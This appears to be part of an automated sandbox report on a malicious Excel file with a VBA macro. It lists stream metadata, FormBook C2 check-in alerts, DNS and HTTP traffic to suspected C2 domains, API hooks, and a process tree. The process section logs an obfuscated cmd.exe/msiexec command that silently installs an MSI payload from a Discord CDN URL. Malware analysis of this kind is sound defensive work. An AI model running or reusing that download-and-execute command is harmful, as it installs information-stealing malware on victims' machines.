                                              File Type:data
                                              Stream Size:244
                                              Entropy:2.74041037669
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:200
                                              Entropy:3.23972423652
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H P . . . . . . . . . . H P . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . P . . . @ . . @ . . . . P . . . @ . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 15373
                                              General
                                              Stream Path:Workbook
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:15373
                                              Entropy:5.2238684044
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . H P B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . ) < . . . . . .
                                              Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 48 50 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 469
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:469
                                              Entropy:5.43137136104
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { 4 D C 9 9 1 7 1 - 8 F D 6 - 4 3 6 5 - 9 1 7 4 - C A A D D 9 D 8 9 1 7 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = A K 2 _ o i M j T t 8 L . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 1 D 3 2 B C 9 2 F C 9 2 F C 9 2 F C 9 2 F " . . D P B = " A 2 A 0 5 8 4 B 2 8 4 C 2 8 4 C 2 8 " . . G
                                              Data Raw:49 44 3d 22 7b 34 44 43 39 39 31 37 31 2d 38 46 44 36 2d 34 33 36 35 2d 39 31 37 34 2d 43 41 41 44 44 39 44 38 39 31 37 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 41 4b 32 5f 6f 69 4d 6a 54 74 38 4c 0d 0a
                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 101
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                              File Type:data
                                              Stream Size:101
                                              Entropy:3.49326462939
                                              Base64 Encoded:False
                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . A K 2 _ o i M j T t 8 L . A . K . 2 . _ . o . i . M . j . T . t . 8 . L . . . . .
                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 41 4b 32 5f 6f 69 4d 6a 54 74 38 4c 00 41 00 4b 00 32 00 5f 00 6f 00 69 00 4d 00 6a 00 54 00 74 00 38 00 4c 00 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4239
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              File Type:data
                                              Stream Size:4239
                                              Entropy:5.33920281264
                                              Base64 Encoded:True
                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                              Data Raw:cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1683
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                              File Type:data
                                              Stream Size:1683
                                              Entropy:3.52816640039
                                              Base64 Encoded:False
                                              Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ ` . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . E G . . . . . . R . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:93 4b 2a a6 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 222
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                              File Type:data
                                              Stream Size:222
                                              Entropy:3.35466888904
                                              Base64 Encoded:False
                                              Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d s . . . . . . . . : . . . . . . . k h I i m J _ G T w c a R V c T R 2 Q 2 i t k U K S G N Z l v t y y E U g y O _ q k F a F k 2 8 a o 4 e a C r 1 6 x T . . . . . . . . . . . . . . .
                                              Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 267
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                              File Type:data
                                              Stream Size:267
                                              Entropy:2.03779203034
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . . . a . . . . L . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 284
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                              File Type:data
                                              Stream Size:284
                                              Entropy:1.92897486147
                                              Base64 Encoded:False
                                              Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 578
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                              File Type:data
                                              Stream Size:578
                                              Entropy:6.36669797508
                                              Base64 Encoded:True
                                              Data ASCII:. > . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 0 . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ s y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                              Data Raw:01 3e b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 30 d4 84 62 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              05/03/21-14:41:57.895397TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22192.0.78.25
                                              05/03/21-14:41:57.895397TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22192.0.78.25
                                              05/03/21-14:41:57.895397TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22192.0.78.25
                                              05/03/21-14:42:34.787262TCP1201ATTACK-RESPONSES 403 Forbidden804916799.83.154.118192.168.2.22
                                              05/03/21-14:42:55.049591TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                              05/03/21-14:42:55.049591TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                              05/03/21-14:42:55.049591TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                              05/03/21-14:42:55.186523TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 3, 2021 14:41:57.854568958 CEST4916680192.168.2.22192.0.78.25
                                              May 3, 2021 14:41:57.895015955 CEST8049166192.0.78.25192.168.2.22
                                              May 3, 2021 14:41:57.895194054 CEST4916680192.168.2.22192.0.78.25
                                              May 3, 2021 14:41:57.895396948 CEST4916680192.168.2.22192.0.78.25
                                              May 3, 2021 14:41:57.938951015 CEST8049166192.0.78.25192.168.2.22
                                              May 3, 2021 14:41:57.942241907 CEST8049166192.0.78.25192.168.2.22
                                              May 3, 2021 14:41:57.942276955 CEST8049166192.0.78.25192.168.2.22
                                              May 3, 2021 14:41:57.942423105 CEST4916680192.168.2.22192.0.78.25
                                              May 3, 2021 14:41:57.942487001 CEST4916680192.168.2.22192.0.78.25
                                              May 3, 2021 14:41:57.984288931 CEST8049166192.0.78.25192.168.2.22
                                              May 3, 2021 14:42:34.580759048 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.621268034 CEST804916799.83.154.118192.168.2.22
                                              May 3, 2021 14:42:34.621448040 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.621727943 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.662168026 CEST804916799.83.154.118192.168.2.22
                                              May 3, 2021 14:42:34.787261963 CEST804916799.83.154.118192.168.2.22
                                              May 3, 2021 14:42:34.787297964 CEST804916799.83.154.118192.168.2.22
                                              May 3, 2021 14:42:34.787580967 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.787672043 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.812506914 CEST804916799.83.154.118192.168.2.22
                                              May 3, 2021 14:42:34.812664032 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.828025103 CEST804916799.83.154.118192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 3, 2021 14:40:53.661741018 CEST5219753192.168.2.228.8.8.8
                                              May 3, 2021 14:40:53.721582890 CEST53521978.8.8.8192.168.2.22
                                              May 3, 2021 14:40:53.726044893 CEST5309953192.168.2.228.8.8.8
                                              May 3, 2021 14:40:53.787493944 CEST53530998.8.8.8192.168.2.22
                                              May 3, 2021 14:41:57.780245066 CEST5283853192.168.2.228.8.8.8
                                              May 3, 2021 14:41:57.843815088 CEST53528388.8.8.8192.168.2.22
                                              May 3, 2021 14:42:14.110984087 CEST6120053192.168.2.228.8.8.8
                                              May 3, 2021 14:42:14.179306984 CEST53612008.8.8.8192.168.2.22
                                              May 3, 2021 14:42:34.358292103 CEST4954853192.168.2.228.8.8.8
                                              May 3, 2021 14:42:34.579305887 CEST53495488.8.8.8192.168.2.22
                                              May 3, 2021 14:42:54.945924044 CEST5562753192.168.2.228.8.8.8
                                              May 3, 2021 14:42:55.007885933 CEST53556278.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              May 3, 2021 14:40:53.661741018 CEST192.168.2.228.8.8.80x3343Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.726044893 CEST192.168.2.228.8.8.80xabfeStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                              May 3, 2021 14:41:57.780245066 CEST192.168.2.228.8.8.80xccffStandard query (0)www.adimadimingilizce.comA (IP address)IN (0x0001)
                                              May 3, 2021 14:42:14.110984087 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.duoteshop.comA (IP address)IN (0x0001)
                                              May 3, 2021 14:42:34.358292103 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.destek-taleplerimiz.comA (IP address)IN (0x0001)
                                              May 3, 2021 14:42:54.945924044 CEST192.168.2.228.8.8.80xf09aStandard query (0)www.111bjs.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              May 3, 2021 14:40:53.721582890 CEST8.8.8.8192.168.2.220x3343No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.721582890 CEST8.8.8.8192.168.2.220x3343No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.721582890 CEST8.8.8.8192.168.2.220x3343No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.721582890 CEST8.8.8.8192.168.2.220x3343No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.721582890 CEST8.8.8.8192.168.2.220x3343No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.787493944 CEST8.8.8.8192.168.2.220xabfeNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.787493944 CEST8.8.8.8192.168.2.220xabfeNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.787493944 CEST8.8.8.8192.168.2.220xabfeNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.787493944 CEST8.8.8.8192.168.2.220xabfeNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.787493944 CEST8.8.8.8192.168.2.220xabfeNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:41:57.843815088 CEST8.8.8.8192.168.2.220xccffNo error (0)www.adimadimingilizce.comadimadimingilizce.comCNAME (Canonical name)IN (0x0001)
                                              May 3, 2021 14:41:57.843815088 CEST8.8.8.8192.168.2.220xccffNo error (0)adimadimingilizce.com192.0.78.25A (IP address)IN (0x0001)
                                              May 3, 2021 14:41:57.843815088 CEST8.8.8.8192.168.2.220xccffNo error (0)adimadimingilizce.com192.0.78.24A (IP address)IN (0x0001)
                                              May 3, 2021 14:42:14.179306984 CEST8.8.8.8192.168.2.220x2f03Name error (3)www.duoteshop.comnonenoneA (IP address)IN (0x0001)
                                              May 3, 2021 14:42:34.579305887 CEST8.8.8.8192.168.2.220x6ec7No error (0)www.destek-taleplerimiz.com99.83.154.118A (IP address)IN (0x0001)
                                              May 3, 2021 14:42:55.007885933 CEST8.8.8.8192.168.2.220xf09aNo error (0)www.111bjs.com111bjs.comCNAME (Canonical name)IN (0x0001)
                                              May 3, 2021 14:42:55.007885933 CEST8.8.8.8192.168.2.220xf09aNo error (0)111bjs.com34.102.136.180A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.adimadimingilizce.com
                                              • www.destek-taleplerimiz.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249166192.0.78.2580C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 3, 2021 14:41:57.895396948 CEST282OUTGET /ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn HTTP/1.1
                                              Host: www.adimadimingilizce.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 3, 2021 14:41:57.942241907 CEST282INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Mon, 03 May 2021 12:41:57 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.adimadimingilizce.com/ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn
                                              X-ac: 2.hhn _dfw
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.224916799.83.154.11880C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 3, 2021 14:42:34.621727943 CEST283OUTGET /ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn HTTP/1.1
                                              Host: www.destek-taleplerimiz.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 3, 2021 14:42:34.787261963 CEST284INHTTP/1.1 403 Forbidden
                                              Date: Mon, 03 May 2021 12:42:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: close
                                              Server: nginx
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: USER32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE7
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE7
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE7
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE7

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:14:40:37
                                              Start date:03/05/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13f0c0000
                                              File size:27641504 bytes
                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:14:40:38
                                              Start date:03/05/2021
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
                                              Imagebase:0x4a700000
                                              File size:345088 bytes
                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:14:40:39
                                              Start date:03/05/2021
                                              Path:C:\Windows\System32\msiexec.exe
                                              Wow64 process (32bit):false
                                              Commandline:mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
                                              Imagebase:0xffb30000
                                              File size:128512 bytes
                                              MD5 hash:AC2E7152124CEED36846BD1B6592A00F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:14:40:40
                                              Start date:03/05/2021
                                              Path:C:\Windows\Installer\MSID8B1.tmp
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Installer\MSID8B1.tmp
                                              Imagebase:0x400000
                                              File size:234172 bytes
                                              MD5 hash:12AB5A6E917A80D7B94F2EBE725A4B23
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:14:40:41
                                              Start date:03/05/2021
                                              Path:C:\Windows\Installer\MSID8B1.tmp
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Installer\MSID8B1.tmp
                                              Imagebase:0x400000
                                              File size:234172 bytes
